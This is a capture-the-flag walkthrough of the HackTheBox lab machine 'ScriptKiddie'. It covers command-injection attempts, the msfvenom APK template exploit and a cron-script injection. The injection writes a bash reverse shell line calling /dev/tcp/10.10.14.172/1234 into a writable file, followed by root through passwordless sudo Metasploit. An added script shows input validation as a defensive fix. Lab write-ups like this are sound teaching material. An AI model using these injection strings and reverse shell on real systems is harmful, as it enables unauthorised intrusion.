This article is about how I rooted the machine “ScriptKiddie” from HackTheBox.
Enumeration
Let’s start with an Nmap scan:
-sC — default script scan
-sV — service/version detection
-o — save the output
We have 2 open ports: 22, 5000.
Visit 10.10.10.226:5000.
It’s a simple website where we can use some pentesting tools.
Let’s fire up “gobuster” against it:
dir — scan for directories
-w — specify wordlist
-x — specify extensions
-u — specify url
-o — save output
We get nothing useful.
Getting a reverse shell
We have an option to use the tool “searchsploit”.
The default syntax for “searchsploit” is “searchsploit [parameter]”.
We can try searching for “openssh; whoami”, so the executed command will be “searchsploit openssh; whoami”.
“whoami” would be executed after “searchsploit openssh”.
We get the following message:
We can try other characters that might be useful, like “||” and “&&”, but all of them are blocked.
Let’s try to find exploits for detected services and versions.
Nothing comes out.
Google “Werkzeug/0.16.1 exploit” and we find “Werkzeug Debug Shell Command Execution”.
Let’s try it.
Fire up Metasploit and follow the instructions.
Set required options and run.
It doesn’t work.
Back on the home page, we can see that we have an option to upload a template file for Windows, Linux and Android.
Let’s google “windows template file”, “linux template file”, “android template file”.
Nothing useful comes up.
Maybe we’re forgetting something, maybe a magic word!
Google “android template file exploit” and we find “Rapid7 Metasploit Framework msfvenom APK Template Command Injection”.
Let’s start Metasploit again and follow the instructions.
We generated a template file for android.
Now, let’s start a netcat listener on port 4444 and upload the template.
Click “generate”, wait a few seconds and we get a reverse shell.
Stabilize the shell
We get a shell as the user “kid”.
Go to kid’s home directory and grab the user flag.
Horizontal Privilege Escalation
Try sudo -l.
We’re asked for a password, which we don’t know.
View cronjobs
Nothing useful here, either.
Going to the /home directory, we see that there’s another user, “pwn”.
In pwn’s home directory, we find a bash script called “scanlosers.sh”.
It’s owned and executed by “pwn”. If we could write into it directly and then execute it, we would get a second reverse shell as the user “pwn”, but we have neither write nor execute permission on it. We have to find another way around.
Notice the “hackers” file mentioned in the script.
It’s owned by us and we can write to it.
If we write something into it, it gets cleared instantly, so some hidden job empties it over and over again.
Maybe the same kind of hidden job executes “scanlosers.sh”. If that’s true, the problem of not having “execute” permission is solved, but we still have to somehow pass a reverse shell to it.
If we take a closer look at “scanlosers.sh”, we notice that it reads the “hackers” file line by line and runs nmap against each entry. nmap is executed via /bin/sh.
If we write the following line into the hackers file:
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.172/1234 0>&1' #" >> hackers
the command executed by the script would be:
sh -c "nmap --top-ports 10 -oN recon/;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.172/1234 0>&1' #…………………..”
“;” terminates the nmap command.
/bin/bash -c means that the command following it will be executed by “bash”.
Then we have a standard bash reverse shell (don’t forget to change the IP and port).
# means that everything after it is treated as a comment: it’s plain text and won’t be executed, so it doesn’t matter what follows it.
So we get something that works with the same logic as SQL injection: untrusted input is concatenated into a command string and then parsed by an interpreter.
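The root cause of this step is the pattern “read lines from a file other users can write, interpolate each line into a string, hand the string to sh -c”. The script below is an added example written for this writeup, not the box’s own scanlosers.sh (whose full contents are not reproduced above), showing how such a job should treat that file: validate every line as a dotted-quad IPv4 address, log and drop anything else, and pass the surviving value to nmap as a single argv element so no shell ever re-parses it. The file name, the recon/ output path and the --top-ports 10 option mirror what the writeup describes; the sample input is constructed.

```shell
#!/bin/sh
# Hardened counterpart to a "scan every host listed in a writable file" cron job.
# Added example for this writeup; not the original scanlosers.sh.

# is_ipv4 ADDR: exit 0 if ADDR is a syntactically valid dotted-quad IPv4 address.
# Anything containing characters other than digits and dots (so ; | & $ ` ' " #
# and whitespace) is rejected before we even count the octets.
is_ipv4() {
    case $1 in
        *[!0-9.]*|''|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS
    IFS=.
    set -- $1            # split on dots into positional parameters
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# vet_targets FILE: print the lines of FILE that pass is_ipv4, one per line,
# and report every rejected line on stderr so the injection attempt is visible
# in the job's log instead of being executed.
vet_targets() {
    while IFS= read -r target || [ -n "$target" ]; do
        if is_ipv4 "$target"; then
            printf '%s\n' "$target"
        else
            printf 'rejected line in %s: %s\n' "$1" "$target" >&2
        fi
    done < "$1"
}

# scan_target ADDR: run the scan with an argument vector. The address is one
# argv element; there is no sh -c and no string for a ";" or "#" to break out of.
scan_target() {
    mkdir -p recon
    nmap --top-ports 10 -oN "recon/$1.nmap" "$1"
}

# Constructed sample input (not from the box): one legitimate address, one
# injection attempt in the style described above, one hostname, one bad octet.
sample=$(mktemp)
printf '%s\n' '10.10.14.172' ';/bin/bash -c "id" #' 'scanme.example' '10.10.14.300' > "$sample"

# Only 10.10.14.172 survives vetting; the other three lines are logged and dropped.
vet_targets "$sample"
rm -f "$sample"
```

In the real job the vetted list would be fed to scan_target, for example with a while-read loop over the output of vet_targets; the example stops short of running nmap so it can be executed anywhere. The two changes that matter are the allow-list check (accept only what a target is supposed to look like, rather than trying to block individual metacharacters the way the web app did with “;”, “||” and “&&”) and the argv-based invocation, which removes the interpreter that made the injection possible in the first place.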
Start a new netcat listener on a different port, one that isn’t currently being used by another process.
Write the reverse shell line into the “hackers” file.
As soon as we hit enter, we get a second reverse shell, as the user “pwn”.
Vertical Privilege Escalation
Getting root is pretty straightforward.
We can start Metasploit with root privileges (root), without using a password (NOPASSWD).
Valuable lesson learned: MAGIC WORD MAKES IMPOSSIBLE POSSIBLE!